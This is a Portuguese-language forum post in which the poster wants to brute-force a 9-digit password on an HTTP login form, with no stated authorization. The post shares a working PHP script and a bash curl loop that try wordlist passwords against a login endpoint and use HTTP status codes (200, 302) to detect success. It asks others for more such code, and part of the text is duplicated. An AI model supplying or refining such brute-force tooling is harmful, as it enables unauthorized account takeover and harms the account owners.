Olá pessoal, estou tentando quebrar uma senha de 9 digitos, é um formulario http que é possivel utilizar brute force
quando voce vai utilizar o hydra ou algum outro programa parecido precisa colocar uma mensagem de error de comparação para saber se o login foi efetuado ou não, minha pergunta é ao inves de colocar essa mensagem de comparação não tem como colocar o Status de resposta da página, como 404, 200, 302 para fazer a comparação ?
eu até fis aqui um script que funciona:
só que precisa ficar com o navegador aberto e é ruim, quero utilizar no prompt
alguem pode compartilhar um code neste stilo de comparação de login ?
no shell tentei assim:
mais ae não está funcionando porque acho que precisa pegar o cookie não é, tem relacionado a isso e não funciona, então até eu conseguir fazer um curl no prompt de comando alguem pode compartilhar em alguma linguagem diferente ??
quando voce vai utilizar o hydra ou algum outro programa parecido precisa colocar uma mensagem de error de comparação para saber se o login foi efetuado ou não, minha pergunta é ao inves de colocar essa mensagem de comparação não tem como colocar o Status de resposta da página, como 404, 200, 302 para fazer a comparação ?
eu até fis aqui um script que funciona:
Código:
<?php set_time_limit(0); echo '<body style="background:#ccc">'; $handle = @fopen("dic.txt", "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://www.teste.com/Login'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'email=teste@gmail.com&password=' . trim($buffer) . ''); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $retorno = curl_exec($ch); curl_setopt($ch, CURLOPT_URL, 'http://www.teste.com/'); $store = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($httpCode >= 200 && $httpCode < 300) { echo "<h1>" . $buffer . "</h1>"; break; } ; if ($httpCode == 302) { echo $buffer; echo "<br>"; } curl_close($ch); } fclose($handle); } ?>
alguem pode compartilhar um code neste stilo de comparação de login ?
no shell tentei assim:
Código:
for i in `cat wordlist.txt` do login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php) if [ $login '==' "302" ] then echo "Password: $i" break else echo "Trying: $i" fi done